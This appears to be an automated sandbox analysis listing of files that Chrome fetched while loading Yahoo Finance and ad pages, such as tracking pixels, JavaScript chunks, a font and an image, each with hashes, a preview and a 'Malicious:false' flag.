                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://ade.googlesyndication.com/ddm/activity/dc_oe=ChMI8ee4mr__iAMV0KqDBx1jmwc-EAAYACDqw_VbQhMIoqSQmL__iAMVWoeDBx0tvgLI;dc_eps=AHas8cDNTafoggHSyQg3Ru7exsF0rapUZG5wNAqicxFSNYHvvpaFhBWH9qlid_D8sUAHw9ICQd1WtU18YHhIjLgIIbU;met=1;&timestamp=1728414911556;eid1=2;ecn1=0;etm1=10;eid2=8047986;ecn2=1;etm2=0;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1399)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1400
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.31252351999454
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:IZlHSXkt+OECsFcWGFt2xgmTAUd6zgVLfTfT6A4Jr22ddOBAzAjMP+HSF:IZJvtHtsrGDtmTHdo0rfTt4J338jMWk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6392EBF700F4B78C063C4B87162CF8A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2B382C8FBC88C9E7C0A1E255A50C8CEF55634D0C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:DEA0CE4CE519950CA1547DA449E5BE6F1BCE083F08FEE48E962C0F4C8ABEE656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:43172E5908BE9E48DE0AD1CC53527E5423302B4F0BA632FAE8BEF260E70ACB0FC741F655878E126928D2EF61A5724AA63477B233F00470945C84D3F3A0069E0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Icon.BSWt_jx8.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as z,p as u,k as v,n as _,i as m,Y as d,A as o,T as b,e as N,H as k,d as H,f as I,z as p,B as g,U as h}from"./scheduler.Dr9AAxFe.js";import{g as S}from"./spread.CgU5AtxT.js";import{S as T,i as q}from"./index.DCSmZEjO.js";function y(a){let e,s,i,l=[{class:i=`icon fin-icon ${a[3]}-icn sz-${a[2]} ${a[0]}`},a[4]],c={};for(let t=0;t<l.length;t+=1)c=o(c,l[t]);return{c(){e=N("div"),s=new k(!1),this.h()},l(t){e=H(t,"DIV",{class:!0});var n=I(e);s=p(n,!1),n.forEach(m),this.h()},h(){s.a=null,g(e,c),h(e,"yf-7v4gbg",!0)},m(t,n){v(t,e,n),s.m(a[1],e)},p(t,n){n&2&&s.p(t[1]),g(e,c=S(l,[n&13&&i!==(i=`icon fin-icon ${t[3]}-icn sz-${t[2]} ${t[0]}`)&&{class:i},n&16&&t[4]])),h(e,"yf-7v4gbg",!0)},d(t){t&&m(e)}}}function A(a){let e,s=typeof a[1]=="string"&&y(a);return{c(){s&&s.c(),e=u()},l(i){s&&s.l(i),e=u()},m(i,l){s&&s.m(i,l),v(i,e,l)},p(i,[l]){typeof i[1]=="string"?s?s.p(i,l):(s=y(i),s.c(),s.m(e.parentNode,e)):s&&(s.d(1),s=null)},i:_,o:_,d(i){i&&m(e),s&&s.d(i)}}}function B(a,e,s){const i=["classNa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1615), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.020901609734713
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:g5Ww5dw4MwlZEa09wmSitQjw4EHG9cBKtVns8RHtm:W5aUl/06mukja7Htm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:12732500BC8E47693F0D777BBE88001C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:97865CCE1C0CD35BAC8AC4B42DC9C6C394DA4809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A03F9A37E34771C42CF7930B2F466EA2077D149F6DBA0E81982E7715A87DD8EF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9ED4368E2415EDEFA87BB461BE701E268F93C076852660B2F3B2E661C25D66CDDDA0DBC236410361935365DD954FE1DDF07541CB44557DE25E85FB73BC2FE2BD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-content")[0],s=a&&a.getElementsByTagName("a")[0],n=s&&s.getAttribute("data-uuid"),o=function(t){var e;try{e=JSON.parse(window.localStorage.getItem(t))||{}}catch(t){}return e}(t);if(n!==o)e.classList.remove("D(n)"),Array.prototype.slice.call(e.getElementsByClassName("featurebar-close-button")).forEach((function(e){e.addEventListener("click",(function(){!function(t,e){try{window.localStorage.setItem(t,JSON.stringify(e))}catch(t){}}(t,n)}))}))}if(e.classList&&e.classList.contains&&e.classList.contains("auto-play")){var r=window.getComputedStyle(e).height,l=Array.prototype.slice.call(e.getElementsByClassName("featurebar-content")),i=0,c=(i+1)%l.length;function u(){setTimeout((function(){l[i].style.transitionDuration=".8s",l[i].style.transform="
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1283)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):14701
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3348186952316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:wcumCSCsoBvJgeFhvKAIuiKWvVGDSvXX+8uVPcte/:IuoBvJguhvKIiZ6SvXtuVPcte/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:5396654C4CEB9F773A4D5853E8F3A101
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D2407F1268403729AAE97ECE5CDABC5C3240F4A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:50D07C739710531D4B32B523DCC33DDF1569C58C681964CFDD52BA97329EF69B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E1C31A64B9BB61FDCF0700CBAD609E8E2AF7111EFA6B157D51D874D7144B909030F0528C743A5CB853A632E0EE99E7AB81A42B35D272C2AD73AA3E311FC1F7B4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/creatives/assets/4309308/gwd3dmodelviewer_min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var f;function ba(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}}function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var c=0;c<a.length;++c){var b=a[c];if(b&&b.Math==Math)return b}throw Error("Cannot find global object");}var da=ca(this);.function g(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):{next:ba(a)}}var ea="function"==typeof Object.create?Object.create:function(a){function c(){}c.prototype=a;return new c},m;if("function"==typeof Object.setPrototypeOf)m=Object.setPrototypeOf;else{var n;a:{var fa={a:!0},p={};try{p.__proto__=fa;n=p.a;break a}catch(a){}n=!1}m=n?function(a,c){a.__proto__=c;if(a.__proto__!==c)throw new TypeError(a+" is not extensible");return a}:null}.var q=m,r=this||self;functi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20581)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20765
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.294839791503179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:mb5vj+l3jfaksTAAvNWUwLATFqACns+CSHDJDLrx:i5vj+5jfSTtrTFqACs+CSHtD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:15065981497259D972918A646AB771E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:F2DE8453FCCB34BAF26D784AFA965DBE8C0D1550
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A1B58D624EEB47E9E3073531A5D364E41A2E7853C052873A79917F97DD0BB44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:38CA7D35BEC8C1E2F3E17EEE4048E724F84B7C44EF001AF83E3CA68281A7E3E77E132283FF3597BFB0069B2B3B5C73BA9C9AFEFB12793EEC2F501D5F13E6D7ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/creatives/assets/4309308/hammer.min.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! Hammer.JS - v2.0.8 - 2016-04-23. * http://hammerjs.github.io/. *. * Copyright (c) 2016 Jorik Tangelder;. * Licensed under the MIT license */.!function(a,b,c,d){"use strict";function e(a,b,c){return setTimeout(j(a,c),b)}function f(a,b,c){return Array.isArray(a)?(g(a,c[b],c),!0):!1}function g(a,b,c){var e;if(a)if(a.forEach)a.forEach(b,c);else if(a.length!==d)for(e=0;e<a.length;)b.call(c,a[e],e,a),e++;else for(e in a)a.hasOwnProperty(e)&&b.call(c,a[e],e,a)}function h(b,c,d){var e="DEPRECATED METHOD: "+c+"\n"+d+" AT \n";return function(){var c=new Error("get-stack-trace"),d=c&&c.stack?c.stack.replace(/^[^\(]+?[\n$]/gm,"").replace(/^\s+at\s+/gm,"").replace(/^Object.<anonymous>\s*\(/gm,"{anonymous}()@"):"Unknown Stack Trace",f=a.console&&(a.console.warn||a.console.log);return f&&f.call(a.console,e,d),b.apply(this,arguments)}}function i(a,b,c){var d,e=b.prototype;d=a.prototype=Object.create(e),d.constructor=a,d._super=e,c&&la(d,c)}function j(a,b){return function(){return a.apply(b,argumen
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42989
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.972257436325248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:it0RGECknahJ3+3OGRRxOfEhvVbNHgsmywg2PVB1FUiAPQpF5OArwDAd95CNXo:itKCval3Och9b1gsUg8B1FfAP8kAcC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0E887C71DF23CF70055700F5FD944784
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0EF7FC74CC130C6A1AF58D7BB6C34F46A0676A18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:3CF22EB0618875DC70021BBC230139B9DADEB4209017B6120FCB1AAE43120F0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:A9D51A3C81D03C181D168D2E37AA6AC2B607F24B13E9444F30AB794C5CE21F8407FF6FD53E7D7056755611E78DA789B903552A98F143B440CF11168684E45315
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:......JFIF.............C....................................................................C.......................................................................................................................W.........................!..1..AQa."q..2B....#R....3TV....$CSbr..47Dct..6FWds.Gu......................................7........................!.1...AQ"#..$23a.%4Bq.C..RS..............?....`..S..1.Z.Tt.?`:.O....iW#.+.Z.J......R.."4p\...V.0O.G-.....Ai..].R.....c^5....[.6e....Z..3....=......u.....^n...Pq....H.O.^5|).....E...fR7..VW.5.}.>.o........ss5.Y..;7Z5O.&...2..V.0.p%(.'.V..=k^N.......O.....7b..E.R..p7....zN.....:+.<..}.i......2..).:.BT.7.......Nh.._.T..Z.A.`./1PM.Gq..%ED.l}kn.f.G%..Yw....u......@.).:....WG.-S....f..6...Ku.| .7T.q...RU..O]..%..]....8.....*V.1}!i.j...!b.......Z.@..z.P.[lg.>t.p.z...&..4k.P...3......x).........D=..y.Gyl,()...)8 .J.Z.V.]....=k{.F......U....H/z..t......2}&.tJ.1.x..x.....a...o..$6..R...=...k..z|.k.5a.^..d.}..nw..3.M-m.Z.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (457)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.8806961233017665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:a1PV6fTJL3lSIss7VU0feFw1PDKTKLA4ev:a1iJxSIDV1feu1sK84w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4B110FF4168F6551B3EF74DF58EF047D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5668BC75EACEFE35E50928DAFD3F4D96A08E4714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1E52AD2B125B6F05F5ED5037BD44186F4B1C2D5FFBAF08E436A3FC1597B214F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:797154B1BA3A9C8DFC21629727E91B234E36140056DCD710DB0A10FEBED5919006E68775FB75DBEB7B34581B69D5D9B04323EFFF606A33336BD96BB7658512C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/star.BeZIjP36.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m22 9.24-7.19-.62L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21 12 17.27 18.18 21l-1.63-7.03zM12 15.4l-3.76 2.27 1-4.28-3.32-2.88 4.38-.38L12 6.1l1.71 4.04 4.38.38-3.32 2.88 1 4.28z"/></svg>',l='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 17.27 18.18 21l-1.64-7.03L22 9.24l-7.19-.61L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21z"/></svg>';export{s as S,l as a};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), CFF, length 57076, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):57076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.996502989210408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:Wl4PAbyXWrt/+vf134e7U7VGBrAN79fonS2BDm3xjq+b:Wqvmrt/+vf1Ie7UV22QnDBD67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:63DC66A0ACB63F7B9C52D3A1996896DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:648035EC31BBF68B9795FA108DA99146193771CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:500BA18736D9E2FC79546B0F1FF540B8D022A0405718C9C460E6DA300F18F7D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F2D3A92D904D763BDD58D61D7E0CF1F8784ADA82F9087F66A3BBF4172EA8ACAB0285D04CFC5F077E7C5407B39F3E81CAD740CD626B178FF7148781F3BCEE18DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Standard-Medium.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:wOF2OTTO..........................................i..$...^....`..j.6.$.......K. [....!..nk.....)..S....`..]..sc........M..-u.".m.....oJ&1..........V..j.n....!e.G..O.ep.Y.ZQ.1N L.a...L&..,....p<..T....?...uq.e..rl....1!w.....bqo.|....*..z...D..O.....O..X..pw.e...R.&L....Yd.....J...>.}.....S..O.....w.b.S...k......}B|..J.........,.s.....*...L\.....1"i.i.M.j..P.".1..<...4C5.&JB2.)..}._?0.........^.G2..@..8t..m.r6u..S..F..:....1I...rLZ.........i.......F.T.TT...=..xJ.8.^.v...b.v...}\{....L..4.S.*..x...F...=..b.S.\.v~f..J.|....`..!.].F.O.7..O.....T.4..2 ........O..<,x......:n.N.TV>.....7.:z ~.k.?n...jTuj'.....7.f.9L;.......}.J..E."....H.....J.*tL.w...q3_<.g./_,S.....5.._.)...ri....R..B....S...O.<..1f.&....2.WXD....X>n..M..L>.).,.k,B...M..'0..{T[.S..F.6.. ..s.....wp.-.L..D.c.9{&.....].e.Fc..m.e.........c.)].lWn.s:...u..I. .Ei...........w~...5.WW.t..j.zZ`....."..E.6.Q.......N..ENB.aY.I.(...)#.....]T.h.|.........i.....~..qby..0.k..<o[....z......SU.(f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (17353)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):17354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.501553080184778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:GM3Y37/TE9XBshxZgZwCl6HmfTLFGYv0YLVsvEbh+KLw2Kt6:Xor/TEDsvZShAmfTLFGYv0YLVoEbh+KL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:57542598D9612CE45101DA6E800557FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EDF04BEA7C8B4B18FDF2856DC14D0CC41044621D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:7DC6975D3416E13EBD09AE0358BAC461F90A0A3AC0DF37734F47E78FBF42ABBB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CDEFBCE01F8CDA746832C7A0FCDC2EF576284A3171D0A6BC7175E18E27DE2ABE8E96D2F1AB493021063AFAB304917AB38F252ED0C7A3E3C3D6B124AAF27B5121
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as Oe,A as W,e as Z,b as z,p as Y,d as $,f as x,i as I,j,B as ie,U as R,k as D,x as Ee,a4 as Ue,r as Ge,D as Ke,T as ge,c as He,u as Pe,g as we,a as ze,q as S,_ as ne,P as Re,l as Q,G as de,v as Ye,t as re,h as fe,m as ue,n as ve,N as ke}from"./scheduler.Dr9AAxFe.js";import{S as Fe,i as Je,t as h,g as E,e as H,a as k,c as q,b as V,m as L,d as y}from"./index.DCSmZEjO.js";import{e as se}from"./each.BExQfwb4.js";import{g as me,a as Qe}from"./spread.CgU5AtxT.js";import{U as We}from"./commonUtil.CI22_Irn.js";import{c as Ze,g as oe}from"./i13nUtil.C-uBpR7k.js";import{I as ce}from"./Icon.BSWt_jx8.js";import{S as $e,O as xe}from"./Select.N-a6-Z3E.js";import{T as el}from"./Tooltip.DgP4ayih.js";import{l as je}from"./yf-lock.ClgspVU1.js";import{l as ll}from"./yf-unlock.DelAiXlN.js";import{w as tl}from"./43.CtYdpA_T.js";const al='<svg xmlns="http://www.w3.org/2000/svg" xml:space="preserve" viewBox="0 0 48 48"><path d="M24 0C10.7 0 0 10.7 0 24s10.7 24 24 24 24-10.7 24-24S37.3 0 24 0m-6.4 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (29171), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):29171
